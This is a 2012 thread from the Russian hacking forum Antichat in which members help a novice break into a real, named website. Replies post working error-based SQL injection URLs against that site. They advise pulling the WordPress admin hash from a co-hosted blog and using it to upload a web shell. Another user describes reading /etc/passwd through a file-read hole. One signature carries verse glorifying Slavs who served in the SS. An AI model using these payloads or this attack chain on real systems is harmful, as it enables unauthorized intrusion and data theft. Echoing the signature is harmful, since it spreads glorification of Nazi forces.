ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
19.06.2012, 17:20
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
Провел на форуме:
183267
Репутация:
84
|
|
Сообщение от kingbeef
blind
так не люблю
|
|
|
20.06.2012, 02:06
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954
Репутация:
32
|
|
Ребят подскажите пожалуйста где находятся конфиги доступа бд в vbulletin 3.3
UPD: нашел ) Includes/config.php
|
|
|
|
20.06.2012, 02:57
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
Провел на форуме:
29020
Репутация:
55
|
|
Есть инъекция с читалкой файлов, нашел там раскрытие путей, но не могу прочитать этот файл, хотя он точно существует, зато могу прочитать /etc/passwd, апачевский конфиг. В конфиге нашел
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]# DocumentRoot: The directory out of which you will serve your
# documents. By default, all requests are taken from this directory, but
# symbolic links and aliases may be used to point to other locations.
#
[/COLOR][COLOR="#0000BB"]DocumentRoot[/COLOR][COLOR="#DD0000"]"/var/www/html"
[/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#FF8000"]# This should be changed to whatever you set DocumentRoot to.
#
[/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
Описаний виртуальных хостов я там не нашел. В раскритии путь выглядит иначе
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]home[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]site[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]public_html[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]music[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]p[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][/COLOR]
Где правду искать ? |
|
|
|
20.06.2012, 04:38
|
|
Новичок
Регистрация: 19.06.2012
Сообщений: 23
Провел на форуме:
7695
Репутация:
-5
|
|
Есть инъекция даже не 1 немогу шелл залить помогите плиз
http://wow.igrosfera.net/acp/index.php?modul=static&id=3
|
|
|
|
20.06.2012, 05:22
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
Провел на форуме:
29020
Репутация:
55
|
|
Ну ты и наркоман, сам то читал что написал ?) Скуля твоя крутится как еррор басед без проблем
Код:
http://wow.igrosfera.net/acp/index.php?modul=static&id=3+or+1+group+by+concat%28%28select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29%29,0x3a,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
там есть доступ к куче бд, походу ко всем что крутится на этом сервере, на одном из поддоменов крутится вордпресс бложек, понел к чему я веду ? |
|
|
|
20.06.2012, 05:30
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от CyberKillerz
Есть инъекция даже не 1 немогу шелл залить помогите плиз
http://wow.igrosfera.net/acp/index.php?modul=static&id=3
Код:
http://wow.igrosfera.net/acp/index.php?modul=static&id=3+and+extractvalue(1,(select+concat(0x2a,(select+table_name+from+information_schema.tables+where+table_schema!='information_schema'+limit+0,1))))
|
|
|
|
20.06.2012, 08:29
|
|
Новичок
Регистрация: 19.06.2012
Сообщений: 23
Провел на форуме:
7695
Репутация:
-5
|
|
Сообщение от trololoman96
Ну ты и наркоман, сам то читал что написал ?) Скуля твоя крутится как еррор басед без проблем
Код:
http://wow.igrosfera.net/acp/index.php?modul=static&id=3+or+1+group+by+concat%28%28select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29%29,0x3a,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
там есть доступ к куче бд, походу ко всем что крутится на этом сервере, на одном из поддоменов крутится вордпресс бложек, понел к чему я веду ? Хм ты намекаешь на его уязвимость ? я просто начинающий )
|
|
|
|
20.06.2012, 09:33
|
|
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
Провел на форуме:
45774
Репутация:
26
|
|
Сообщение от CyberKillerz
Хм ты намекаешь на его уязвимость ? я просто начинающий )
он намекает, чтоб ты вытащил логин и хеш админа вордпресса и через этот блог залил шелл...
|
|
|
|
20.06.2012, 09:40
|
|
Новичок
Регистрация: 19.06.2012
Сообщений: 23
Провел на форуме:
7695
Репутация:
-5
|
|
Сообщение от smirk
он намекает, чтоб ты вытащил логин и хеш админа вордпресса и через этот блог залил шелл...
а ни кто не поможет с брутом а то у мну с ним постоянная проблема ))
|
|
|
|
20.06.2012, 11:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от CyberKillerz
а ни кто не поможет с брутом а то у мну с ним постоянная проблема ))
брут чего? хеша? есть раздел выше про расшифровку хеша, запости туда свой хеш и надейся ,что его расшифруют
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для DJ ][akep](/avatars/avatar48987.jpg?3183312){kind=avatar}
Похожие темы
Комбинированный вид
